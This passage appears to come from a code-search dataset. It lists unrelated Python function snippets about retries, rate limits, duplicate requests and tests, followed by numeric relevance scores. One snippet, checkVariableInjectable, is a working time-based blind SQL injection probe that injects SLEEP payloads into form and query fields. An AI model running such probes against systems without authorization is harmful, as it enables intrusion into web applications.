self.repeat:\n self.repeat[donor].add(year)\n for y in self.repeat[donor]:\n if y < year:\n return True\n return False\n else:\n self.repeat[donor] = {year}\n return False", "def check_loop(\n url, period=5, timeout=10, body_check_re='',\n producer=None, oneshot=False):\n while True:\n worker = threading.Thread(target=check, kwargs={\n 'url': url,\n 'timeout': timeout,\n 'body_check_re': body_check_re,\n 'producer': producer,\n })\n logger.info('check url=%s' % url)\n worker.start()\n time.sleep(period)\n if oneshot:\n return", "def request_already_queued(self, request: str):\n try:\n self.create_request_queue_if_not_exists()\n queue = []\n db = self.get_db_safely()\n cursor = db.cursor()\n cursor.execute(\n \"\"\"SELECT rowid FROM queue WHERE request = ?\"\"\",\n (request,))\n for row in cursor:\n queue.append(row)\n if len(queue) == 0:\n return False\n else:\n return True\n except sqlite3.Error:\n # This is a lie, but we don't want to try and enqueue something if we got an error here.\n return True", "def repeat(times, intensive_times=None):\n if intensive_times is None:\n return repeat_with_success_at_least(times, times)\n\n casual_test = bool(int(os.environ.get('CUPY_TEST_CASUAL', '0')))\n times_ = times if casual_test else intensive_times\n return repeat_with_success_at_least(times_, times_)", "def valid(self):\r\n return self.resumable and self.sessionID", "def use_proxy(self, request):\n # if \"depth\" in request.meta and int(request.meta['depth']) <= 2:\n # return False\n # i = random.randint(1, 10)\n # return i <= 2\n return True", "def is_rate_limit_exceeded(self, request):\r\n counts = self.get_counters(request)\r\n return sum(counts.values()) >= self.requests", "def data_ready(req, cache):\n if not isinstance(req, list):\n req = [req]\n return all([r in cache for r in req])", "def log_once(key):\r\n\r\n global _last_logged\r\n\r\n if _disabled:\r\n return False\r\n elif key not in _logged:\r\n _logged.add(key)\r\n _last_logged = time.time()\r\n return True\r\n elif _periodic_log and time.time() - _last_logged > 60.0:\r\n _logged.clear()\r\n _last_logged = time.time()\r\n return False\r\n else:\r\n return False", "def retry(self):\n return False", "def check_already_scraped(self, season_title, competition_title, event_title, event_gender, round_title,\n instance_of_event_in_competition) -> bool:\n if len(self.already_scraped[(self.already_scraped['season'] == season_title) &\n (self.already_scraped['competition'] == competition_title) &\n (self.already_scraped['event'] == event_title) &\n (self.already_scraped['instance_of_event_in_competition'] ==\n instance_of_event_in_competition) &\n (self.already_scraped['gender'] == event_gender) &\n (self.already_scraped['round'] == round_title)]):\n self.log(message=f\"Round already discovered: {season_title}-{competition_title}-\"\n f\"{event_title}-{instance_of_event_in_competition}-\"\n f\"{event_gender}-{round_title}\",\n level=INFO)\n return True\n self.log(message=f\"New round discovered: {season_title}-{competition_title}-\"\n f\"{event_title}-{instance_of_event_in_competition}-\"\n f\"{event_gender}-{round_title}\",\n level=INFO)\n return False", "def test_request_retries(self, nosleep, method):\n # Dummies for K8s API URL and `requests` session.\n url = 'http://localhost:12345/'\n client = k8s.requests.Session()\n\n # Test function must not return a response but indicate an error.\n ret = k8s.request(client, method, url, None, None)\n assert ret == ({}, True)\n\n # Windows is different. 
No idea why but it refuses to connect more than\n # three times. Mac and Linux behave as expected.\n if sys.platform.startswith(\"win\"):\n assert nosleep.call_count == 3\n else:\n assert nosleep.call_count == 20", "def is_duplicate(self, **kwargs):\n return len(list(self.c.select(**kwargs))) > 0", "def testMultipleRequests(self):\n response = self.translator.parse_reply(self.factory.result)\n d = self._getClientConnection()\n for _ in range(1000):\n d.addCallback(lambda _: self.client.check_rate_limit())\n d.addCallback(self.assertEqual, response)\n return d", "def will_occur(self, now):\n return self.end_repeat is None or self.end_repeat >= now.date() or \\\n self.l_start_date >= now or self.l_end_date >= now", "async def _check_cooldown(self, request_id: int) -> bool:\n raise NotImplementedError()", "def repeat(self):\n return self._repeat", "def check_for_lock_request(self):\n while True:\n sleep(0.1)\n if self.get_state():\n sleep(5)\n self.lock()\n break", "def reqIDScan(self):\n for val in self._values:\n if val.reqIDScan(): return True\n return False", "async def _periodic_request(self) -> None:\r\n\r\n if not self._periodic_request_enabled:\r\n _LOGGER.warning(\r\n \"periodic request was not enabled at setup. This error should not appear.\"\r\n )\r\n return False\r\n\r\n await self.request_data()\r\n\r\n sleep = self._refresh_interval\r\n if self._fast_polling_count < self._fast_polling_count_max:\r\n self._fast_polling_count += 1\r\n sleep = self._refresh_interval_fast_polling\r\n\r\n _LOGGER.info(\"Periodic data request executed, now wait for %s seconds\", sleep)\r\n await asyncio.sleep(sleep)\r\n\r\n self._polling_task = self._loop.create_task(self._periodic_request())\r\n _LOGGER.debug(\"Periodic data request rescheduled\")", "def repeat(self, repeat: bool=None):\n self._select_interface(self._rc_repeat, self._http_repeat, repeat)", "def condition(self):\n return True", "def go_again(self):\n num = random.randint(1, 2)\n if num == 1:\n return True\n else:\n return False", "def _isNewTxn(self, identifier, reply, txnId) -> bool:\n return (identifier not in self.processedRequests or\n reply.reqId not in self.processedRequests[identifier]) and \\\n txnId is not None", "def can_retry(self, opname):\n\n if self.retry_deny and opname in self.retry_deny:\n return False\n\n if self.retry_allow and opname not in self.retry_allow:\n return False\n\n return True", "def can_be_modified(self):\n return self.state in {RequestState.pending, RequestState.accepted}", "def abort_already_made_request(rideID, user):\n reqs = get_ride_requests(rideID)\n\n for req in reqs:\n if req.user_id == user:\n msg = \"You have already made a request\"\n abort(HTTPStatus.CONFLICT, message=msg)", "def verify_repeat(self, new_repeat: 'Repeater') -> Optional['Repeater']:\n if new_repeat.StartingFrom in self.get_steps_names():\n return new_repeat\n else:\n return None", "def checkVariableInjectable():\n\n # innanzitutto calcolo il tempo medio su cinque richieste alla stessa pagina\n timeConnessione=[]\n for i in range(5):\n start=time.time()\n req=requests.post(\"%s\"%(OptionConfiguration.destination[0]))\n req.content\n end=time.time()\n timeConnessione.append(end-start)\n\n\n OptionConfiguration.tempoMedioConnessione=sum(timeConnessione)/5\n tempoMassimo=max(timeConnessione)\n # ottimizzo il tempo di connessione\n OptionConfiguration.timeToWait=int(tempoMassimo*5)+1;\n #OptionConfiguration.timeToWait=int(tempoMassimo*30)+1\n #print (OptionConfiguration.timeToWait);\n # il metodo di invio scelto e il POST\n\n if 
OptionConfiguration.methodSentData==\"POST\" :\n\n for key in OptionConfiguration.key:\n\n dataToSent=OptionConfiguration.data.copy()\n dataToSent[key]=dataToSent[key]+ \" AND SLEEP(%s)\"%(OptionConfiguration.timeToWait)\n #print dataToSent\n start=time.time()\n re=requests.post(\"%s\"%OptionConfiguration.destination[0],data=dataToSent)\n re.content\n re.close()\n end=time.time()\n\n if((end-start)>=OptionConfiguration.timeToWait):\n\n #print(\"The field '%s' appear injectable on Time-Based Blind SQLi (value int)\"%(key))\n start = time.time()\n re = requests.post(\"%s\" % OptionConfiguration.destination[0], data=dataToSent)\n re.content\n re.close()\n end = time.time()\n\n if((end-start)>=OptionConfiguration.timeToWait):\n\n OptionConfiguration.valueInjectable=key;\n OptionConfiguration.typeOfValue=\"int\"\n return True;\n\n else:\n\n #controllare se invece devo aggiunger un '\n dataToSent = OptionConfiguration.data.copy()\n dataToSent[key] = dataToSent[key] + \"' AND SLEEP(%s) -- -\"%(OptionConfiguration.timeToWait)\n # print dataToSent\n start = time.time()\n re = requests.post(\"%s\" % OptionConfiguration.destination[0], data=dataToSent)\n re.content\n re.close()\n end = time.time()\n\n if((end-start)>=OptionConfiguration.timeToWait):\n\n #print(\"The field '%s' appear injectable on Time Based Blind SQLi (value string)\" % (key))\n start = time.time()\n re = requests.post(\"%s\" % OptionConfiguration.destination[0], data=dataToSent)\n re.content\n re.close()\n end = time.time()\n\n if ((end - start) >= OptionConfiguration.timeToWait):\n\n OptionConfiguration.valueInjectable=key\n OptionConfiguration.typeOfValue=\"string\"\n return True;\n\n return False;\n\n #metodo di invio e il get\n elif OptionConfiguration.methodSentData == \"GET\":\n for key in OptionConfiguration.key:\n dataToSent = OptionConfiguration.data.copy()\n dataToSent[key] = dataToSent[key] + \" AND SLEEP(%s)\"%(OptionConfiguration.timeToWait)\n\n # essendo in get attacco i dati all'url\n data=creaStringaGet(dataToSent)\n #print (data)\n start = time.time()\n re = requests.get(\"%s?%s\" %(OptionConfiguration.destination[0],data))\n re.content\n re.close()\n end = time.time()\n if (end - start >= OptionConfiguration.timeToWait):\n #print(\"The field '%s' appear injectable on Time Based Blind SQLi (value int)\" % (key))\n OptionConfiguration.valueInjectable = key;\n OptionConfiguration.typeOfValue=\"int\"\n return True;\n\n else:\n #controllo se il campo e' una stringa\n #controllare se invece devo aggiunger un '\n dataToSent = OptionConfiguration.data.copy()\n dataToSent[key] = dataToSent[key] + \"' AND SLEEP(%s) -- -\"%(OptionConfiguration.timeToWait)\n data = creaStringaGet(dataToSent)\n # print dataToSent\n start = time.time()\n re = requests.get(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n re.content\n re.close()\n end = time.time()\n # se e una stringa il campo come posso fare?\n if(end-start>=OptionConfiguration.timeToWait):\n #print(\"The field '%s' appear injectable on Time Based Blind SQLi (value string)\" % (key))\n OptionConfiguration.valueInjectable = key;\n OptionConfiguration.typeOfValue = \"string\"\n return True;\n\n return False;\n else:\n\n print (OptionConfiguration.bcolors.BOLD+OptionConfiguration.bcolors.FAIL+\n \"Method to send data does not exist\"+OptionConfiguration.bcolors.ENDC)\n\n parseOptions.help()\n return False;", "def test_add_flow_request_only_one_validity_date_provided(self):\n for param in ('start_validity', 'expire_validity'):\n flow_request = self.flow_request.copy()\n 
del flow_request['start_validity']\n res = self._add_flow_request(flow_request=flow_request)", "def running(request):\r\n return request.session.get('partial_pipeline') is not None # Avoid False for {}.\r", "def needRestock(self):\n #TODO check if the quantity<threshold and return true if it is\n #we'll set for now the threshold at *five* items\n #so we need to check if self.quantity is less than five.\n threshold = 5\n if self.quantity < threshold:\n return True\n else:\n return False", "def need_update(self):\n five_minutes_ago = datetime.now() - timedelta(minutes=5)\n if (\n self.fetch_status != self.FetchStatus.NONE\n and self.collected_at > five_minutes_ago\n ):\n return False\n return True", "def hasura_request(record: dict) -> bool:\n # Get data/crash_id from Hasura Event request\n data = load_data(record=record)\n\n # Try getting the crash data\n crash_id = get_crash_id(data)\n city_id = get_city_id(data)\n old_jurisdiction_flag = get_jurisdiction_flag(data)\n\n new_jurisdiction_flag = is_crash_in_jurisdiction(crash_id)\n\n # If the city id is not already 22, then check...\n if city_id != 22 and is_crash_in_jurisdictions(crash_id):\n # Update the city_id to 22\n update_city_id(crash_id=crash_id, city_id=22)\n\n # If the old and new flags are the same, then ignore...\n if old_jurisdiction_flag == new_jurisdiction_flag:\n return False\n else:\n update_jurisdiction_flag(\n crash_id=crash_id,\n new_flag=new_jurisdiction_flag,\n )\n return True", "def execute_request(self, request: Request) -> bool:\r\n print(\"Handler is validating key\")\r\n if request.key is not None:\r\n if not self.next_handler:\r\n return True\r\n return self.next_handler.execute_request(request)\r\n else:\r\n print(\"Key is not valid\")\r\n return False", "def is_fivefold_repetition(self) -> bool:\n return self.is_repetition(3)", "def has_key(self, key):\n return key in self.responses", "def match_request(self, req):\n\n return req.method == 'POST' and req.path_info == '/bitbucketsync'", "def test_build__subsequent_calls_return_new_recurring_ride(self) -> None:\n ride_one: dict = RecurringRideFactory.build()\n ride_two: dict = RecurringRideFactory.build()\n\n assert ride_one != ride_two", "def test_singleConcurrentRequest(self):\n resolver = client.Resolver(servers=[('example.com', 53)])\n resolver.protocol = StubDNSDatagramProtocol()\n queries = resolver.protocol.queries\n\n query = dns.Query('foo.example.com', dns.A, dns.IN)\n # The first query should be passed to the underlying protocol.\n firstResult = resolver.query(query)\n self.assertEqual(len(queries), 1)\n\n # The same query again should not be passed to the underlying protocol.\n secondResult = resolver.query(query)\n self.assertEqual(len(queries), 1)\n\n # The response to the first query should be sent in response to both\n # queries.\n answer = object()\n response = dns.Message()\n response.answers.append(answer)\n queries.pop()[-1].callback(response)\n\n d = defer.gatherResults([firstResult, secondResult])\n def cbFinished((firstResponse, secondResponse)):\n self.assertEqual(firstResponse, ([answer], [], []))\n self.assertEqual(secondResponse, ([answer], [], []))\n d.addCallback(cbFinished)\n return d", "def test_duplicate_questions(self):\n self.is_authenticated()\n self.post_question()\n response = self.post_question()\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)", "def check_allow_reset(self):\r\n if not self.ready_to_reset:\r\n if self.current_task_number > 0:\r\n last_response_data = 
self.get_last_response(self.current_task_number - 1)\r\n current_response_data = self.get_current_attributes(self.current_task_number)\r\n\r\n if (current_response_data['min_score_to_attempt'] > last_response_data['score']\r\n or current_response_data['max_score_to_attempt'] < last_response_data['score']):\r\n self.state = self.DONE\r\n self.ready_to_reset = True\r\n\r\n return self.ready_to_reset", "def add_request(self, request):\r\n\t\tself.requestCt = self.requestCt + 1\r\n\t\tfound = False\r\n\t\tfor req in self.requests:\r\n\t\t\tif \treq.service == request.service and \\\r\n\t\t\t\treq.host == req.host and \\\r\n\t\t\t\treq.port == req.port:\r\n\t\t\t\t\treq.timestamp = request.timestamp\r\n\t\t\t\t\tfound = True\r\n\t\t\t\t\tbreak\r\n\t\tif not found:\r\n\t\t\tself.requests.append(request)\r\n\t\t\tself.last_modified = time.time()", "def check_api(submitted_key, users_key):\r\n if users_key != submitted_key:\r\n return False\r\n else:\r\n return True", "def test_process_reply0(self):\n req1 = FakeRequest(1, True) # expired\n req2 = FakeRequest(2, False) # not expired\n req3 = FakeRequest(3, True)\n req4 = FakeRequest(4, False)\n req5 = FakeRequest(5, False)\n\n self.request_buffer.append(req1)\n self.request_buffer.append(req2)\n self.request_buffer.append(req3)\n self.request_buffer.append(req4)\n self.request_buffer.append(req5)\n\n reply = FakeReply(id=5)\n\n self.request_buffer.process_reply(reply)\n\n self.assertTrue(\n req1 in self.request_buffer.requests and\n req2 in self.request_buffer.requests and\n req3 in self.request_buffer.requests and\n req4 in self.request_buffer.requests and\n req5 not in self.request_buffer.requests\n )", "def _is_repeatedshot_type(cls, object_):\n return (type(object_).__name__ in ['RepeatedShot'])" ]
[ "0.7024639", "0.6854883", "0.6750136", "0.6601198", "0.6564489", "0.64355195", "0.61150056", "0.60088533", "0.5957636", "0.58485484", "0.57753676", "0.574291", "0.57246184", "0.5706755", "0.55322963", "0.549886", "0.5494331", "0.5449525", "0.5437684", "0.5399534", "0.5398021", "0.5397708", "0.5381306", "0.5360023", "0.5333514", "0.532608", "0.5287151", "0.5279226", "0.52788466", "0.52587765", "0.5245239", "0.5220736", "0.51945025", "0.51942986", "0.51770455", "0.5175401", "0.5169993", "0.51668024", "0.5142144", "0.51407677", "0.51385665", "0.51325536", "0.5121564", "0.5103263", "0.51010656", "0.5089064", "0.5083369", "0.50698566", "0.50628465", "0.50564396", "0.5054437", "0.50542235", "0.50392574", "0.503518", "0.5023856", "0.5022871", "0.50136036", "0.5013403", "0.50073236", "0.50030786", "0.49951327", "0.49884355", "0.4973491", "0.49608177", "0.49529472", "0.49505883", "0.49460205", "0.49367797", "0.49254745", "0.4924899", "0.49247277", "0.49232957", "0.4909869", "0.49091977", "0.49035236", "0.48997045", "0.48988077", "0.4896736", "0.48963562", "0.48905817", "0.4888436", "0.4883387", "0.48678833", "0.48635498", "0.48461658", "0.48373827", "0.48336446", "0.4831889", "0.48318195", "0.4829598", "0.4827421", "0.48257294", "0.48249853", "0.48223132", "0.48189956", "0.48151812", "0.48149553", "0.4808047", "0.4807303", "0.48052257" ]
0.5810275
10
Stuff to do before every test.
def setUp(self):
    # Get the Flask test client
    self.client = app.test_client()
    #Shows Flask errors that happen during tests
    app.config['TESTING'] = True
    #To test sessions we need to set Secret key
    app.config['SECRET_KEY'] = 'key'
    # Connect to test database
    connect_to_db(app, "postgresql:///testdb")
    # Create tables and add sample data
    db.create_all()
    users()
    reviews()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def before_run_tests(cls):\n pass", "def do_before(self):\r\n pass", "def before_test(self, func, *args, **kwargs):\n pass", "def setUp(self):\r\n # nothing to do, all tests use different things\r\n pass", "def setUp(self):\n print(\"New test by Nikolay Melnik\")", "def beforeTest(self, test):\n self.setupLoghandler()", "def before(self) -> None:\n pass", "def setUp(self):\r\n pass # nothing used by all\r", "def setUp(self):\n pass #because we dont have anything to setup.", "def setUp(self) -> None:\n pass", "def setUp(self) -> None:\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\r\n pass # nothing required by all\r", "def setUp(self):\n\n pass", "def setUp(self):\n\n pass", "def setUp(self) :\n pass", "def setUp(self):\n\n return", "def setUp(self):\r\n pass", "def setUp(self):\n print('Calling \\'setUp\\'')", "def setUp(self):\n self", "def setUp(self):\n self", "def setUp(self):\n \n pass", "def setUp(self):\r\n print('---------------------------------------------\\n')\r\n print('STARTING TEST...')", "def setUp(self):\n\n BaseTest.setUp(self)", "def startTestHook(self):", "def setUp(self):\n MainTests.setUp(self)", "def setUp(self):\n setUp()", "def setUp(self):\n super(BasicTestCase, self).setUp()", "def setUp(self):\n test_env_setup()", "def setUp_extra(self):\n pass", "def setUp(self):\n print(\"\\nIn setUp()...\")", "def setUp(self):\n\n # ISSUE007\n # TODO, pyunit's bright idea is to call setup before each test. It\n # was defining multiple patterns which was annoying but not a problem.\n # The cleanest way to do things is probably to remove patterns after\n # the test, but we don't have that functionality. 
For now just create\n # one pattern to avoid confusion, but do it by hacking in a global\n # variable\n\n global firstTime\n\n if not firstTime:\n return\n firstTime = False\n\n # get the full source name for even and odd sources\n out_of_order_numbers = quilt_test_core.get_source_name(\n \"out_of_order_numbers\")\n\n # TODO REad the pattern id from the std output then query that one\n # See ISSUE007 and ISSUE008\n # call quilt_define with the pattern code and name query\n # dups_follows\n quilt_test_core.call_quilt_script('quilt_define.py', ['-n',\n 'out_of_order',\n 'source(\"' + out_of_order_numbers + '\",\"grep\")'])", "def setUp(self):\n\t\tprint(\"\\n-------------------------------------\\nIn Test_RMT_Util:\", self._testMethodName)", "def XXsetUp(self):\n print(\"FooTest:setUp_:begin\")\n ## do something...\n print(\"FooTest:setUp_:end\")", "def XXsetUp(self):\n print(\"FooTest:setUp_:begin\")\n ## do something...\n print(\"FooTest:setUp_:end\")", "def setUpTestCase(self):\n pass", "def setUp(self):\n raise NotImplementedError", "def setUp(self) -> None:\n return super().setUp()", "def setUp(self):\n\n self._set_up()", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n self.setup_beets()", "def setUp(self):\n print 'unittest.setUp()'\n pass", "def setUp(self):\n logging.debug('setting up')", "def setUp(self):\n logging.debug('setting up')", "def setUp(self):\n if not self.flag:\n self.fail(self.err_msg)", "def setUp(self):\n # use self.attribute to keep anything which needs to be accessed later\n print('setUp method\\n')", "def before_each_test(self, request):\n self.test_counter = Counter()\n self.check_ref = request.config.getvalue(\"check_ref\")\n self.create_ref = request.config.getvalue(\"create_ref\")", "def setUp(self):\n super(TestCase, self).setUp()\n self._context = CallContext()", "def on_before_execution(self):\n pass", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n self.setUpPyfakefs()", "def startTestRun(self):", "def setUp(self):\n assert COMMANDS.keys() == EXPCT_RESULTS.keys()\n self.tests = []\n self.test_numbers = deque(sorted(COMMANDS.keys()))", "def __call__(self, result=None):\n self._pre_setup()\n super(TestCase, self).__call__(result)\n self._post_tearDown()", "def _fixture_setup(self):\n pass", "def test_begin(self):", "def setUp(self):\n\t\tprint(\"\\n-------------------------------------\\nIn Test_ValidParams:\", self._testMethodName)", "def setUp(self):\n self.Reinitialize()", "def setUp(self):", "def setUp(self):", "def setUp(self):", "def setUp(self):" ]
[ "0.8211315", "0.802689", "0.80261695", "0.7873411", "0.76571673", "0.76434696", "0.76261467", "0.75419456", "0.75174975", "0.7496759", "0.7496759", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.7430124", "0.74281", "0.74281", "0.74227977", "0.7386099", "0.73804355", "0.737223", "0.73658484", "0.73658484", "0.7358147", "0.7357924", "0.73548126", "0.73508036", "0.73495203", "0.73456866", "0.7265522", "0.7265506", "0.7240312", "0.7171149", "0.71399295", "0.71390784", "0.71355546", "0.71355546", "0.7121487", "0.7119764", "0.71033466", "0.7096523", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.6991247", "0.69881433", "0.6983108", "0.6983108", "0.69539803", "0.6946693", "0.6936619", "0.68873084", "0.6879564", "0.6879344", "0.6879344", "0.6879344", "0.6879344", "0.6879344", "0.6879344", "0.6862542", "0.68564135", "0.6853987", "0.68533516", "0.6852911", "0.6827207", "0.68068117", "0.68066335", "0.67981744", "0.67981744", "0.67981744", "0.67981744" ]
0.0
-1
Stuff to do before every test.
def setUp(self):
    # Get the Flask test client
    self.client = app.test_client()
    # Show Flask errors that happen during tests
    app.config['TESTING'] = True
    #To test sessions we need to set Secret key
    app.config['SECRET_KEY'] = 'key'
    # Connect to test database
    connect_to_db(app, "postgresql:///testdb")
    # Create tables and add sample data
    db.create_all()
    users()
    reviews()
    with self.client as c:
        with c.session_transaction() as sess:
            sess['user_id'] = 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def before_run_tests(cls):\n pass", "def do_before(self):\r\n pass", "def before_test(self, func, *args, **kwargs):\n pass", "def setUp(self):\r\n # nothing to do, all tests use different things\r\n pass", "def setUp(self):\n print(\"New test by Nikolay Melnik\")", "def beforeTest(self, test):\n self.setupLoghandler()", "def before(self) -> None:\n pass", "def setUp(self):\r\n pass # nothing used by all\r", "def setUp(self):\n pass #because we dont have anything to setup.", "def setUp(self) -> None:\n pass", "def setUp(self) -> None:\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\r\n pass # nothing required by all\r", "def setUp(self):\n\n pass", "def setUp(self):\n\n pass", "def setUp(self) :\n pass", "def setUp(self):\n\n return", "def setUp(self):\r\n pass", "def setUp(self):\n print('Calling \\'setUp\\'')", "def setUp(self):\n self", "def setUp(self):\n self", "def setUp(self):\n \n pass", "def setUp(self):\r\n print('---------------------------------------------\\n')\r\n print('STARTING TEST...')", "def setUp(self):\n\n BaseTest.setUp(self)", "def startTestHook(self):", "def setUp(self):\n MainTests.setUp(self)", "def setUp(self):\n setUp()", "def setUp(self):\n super(BasicTestCase, self).setUp()", "def setUp(self):\n test_env_setup()", "def setUp_extra(self):\n pass", "def setUp(self):\n print(\"\\nIn setUp()...\")", "def setUp(self):\n\n # ISSUE007\n # TODO, pyunit's bright idea is to call setup before each test. It\n # was defining multiple patterns which was annoying but not a problem.\n # The cleanest way to do things is probably to remove patterns after\n # the test, but we don't have that functionality. 
For now just create\n # one pattern to avoid confusion, but do it by hacking in a global\n # variable\n\n global firstTime\n\n if not firstTime:\n return\n firstTime = False\n\n # get the full source name for even and odd sources\n out_of_order_numbers = quilt_test_core.get_source_name(\n \"out_of_order_numbers\")\n\n # TODO REad the pattern id from the std output then query that one\n # See ISSUE007 and ISSUE008\n # call quilt_define with the pattern code and name query\n # dups_follows\n quilt_test_core.call_quilt_script('quilt_define.py', ['-n',\n 'out_of_order',\n 'source(\"' + out_of_order_numbers + '\",\"grep\")'])", "def setUp(self):\n\t\tprint(\"\\n-------------------------------------\\nIn Test_RMT_Util:\", self._testMethodName)", "def XXsetUp(self):\n print(\"FooTest:setUp_:begin\")\n ## do something...\n print(\"FooTest:setUp_:end\")", "def XXsetUp(self):\n print(\"FooTest:setUp_:begin\")\n ## do something...\n print(\"FooTest:setUp_:end\")", "def setUpTestCase(self):\n pass", "def setUp(self):\n raise NotImplementedError", "def setUp(self) -> None:\n return super().setUp()", "def setUp(self):\n\n self._set_up()", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n self.setup_beets()", "def setUp(self):\n print 'unittest.setUp()'\n pass", "def setUp(self):\n logging.debug('setting up')", "def setUp(self):\n logging.debug('setting up')", "def setUp(self):\n if not self.flag:\n self.fail(self.err_msg)", "def setUp(self):\n # use self.attribute to keep anything which needs to be accessed later\n print('setUp method\\n')", "def before_each_test(self, request):\n self.test_counter = Counter()\n self.check_ref = request.config.getvalue(\"check_ref\")\n self.create_ref = request.config.getvalue(\"create_ref\")", "def setUp(self):\n super(TestCase, self).setUp()\n self._context = CallContext()", "def on_before_execution(self):\n pass", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n self.setUpPyfakefs()", "def startTestRun(self):", "def setUp(self):\n assert COMMANDS.keys() == EXPCT_RESULTS.keys()\n self.tests = []\n self.test_numbers = deque(sorted(COMMANDS.keys()))", "def __call__(self, result=None):\n self._pre_setup()\n super(TestCase, self).__call__(result)\n self._post_tearDown()", "def _fixture_setup(self):\n pass", "def test_begin(self):", "def setUp(self):\n\t\tprint(\"\\n-------------------------------------\\nIn Test_ValidParams:\", self._testMethodName)", "def setUp(self):\n self.Reinitialize()", "def setUp(self):", "def setUp(self):", "def setUp(self):", "def setUp(self):" ]
[ "0.8211315", "0.802689", "0.80261695", "0.7873411", "0.76571673", "0.76434696", "0.76261467", "0.75419456", "0.75174975", "0.7496759", "0.7496759", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.7430124", "0.74281", "0.74281", "0.74227977", "0.7386099", "0.73804355", "0.737223", "0.73658484", "0.73658484", "0.7358147", "0.7357924", "0.73548126", "0.73508036", "0.73495203", "0.73456866", "0.7265522", "0.7265506", "0.7240312", "0.7171149", "0.71399295", "0.71390784", "0.71355546", "0.71355546", "0.7121487", "0.7119764", "0.71033466", "0.7096523", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.6991247", "0.69881433", "0.6983108", "0.6983108", "0.69539803", "0.6946693", "0.6936619", "0.68873084", "0.6879564", "0.6879344", "0.6879344", "0.6879344", "0.6879344", "0.6879344", "0.6879344", "0.6862542", "0.68564135", "0.6853987", "0.68533516", "0.6852911", "0.6827207", "0.68068117", "0.68066335", "0.67981744", "0.67981744", "0.67981744", "0.67981744" ]
0.0
-1
Do at end of every test.
def tearDown(self):
    db.session.close()
    db.drop_all()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_finished(self):\n\n # We'll start the next test in an idle, so that the current one is\n # properly terminated, and we do not execute in its context\n\n GLib.idle_add(self._do_test)", "def test_run_ended(self):", "def finished_tests(self):\n self.testing = 0", "def tearDown(self):\n\t\tprint(\"end test\")\n\t\tpass", "def after_test(self, test_results):\n pass", "def endOfTestcase(self):\n pass # nothing to do here. Hence pass statement is called.", "def on_test_end(self, logs=None):", "def after_all(self) -> None:", "def on_test_end(self):\n for callback in self.callbacks:\n callback.on_test_end(self, self.get_model())", "def after_test(self, func, *args, **kwargs):\n pass", "def XXtearDown(self):\n print(\"FooTest:tearDown_:begin\")\n ## do something...\n print(\"FooTest:tearDown_:end\")", "def XXtearDown(self):\n print(\"FooTest:tearDown_:begin\")\n ## do something...\n print(\"FooTest:tearDown_:end\")", "def tearDown(self):\n pass\n # teardown called after each test\n # e.g. maybe write test results to some text file", "def tearDown(self):\n 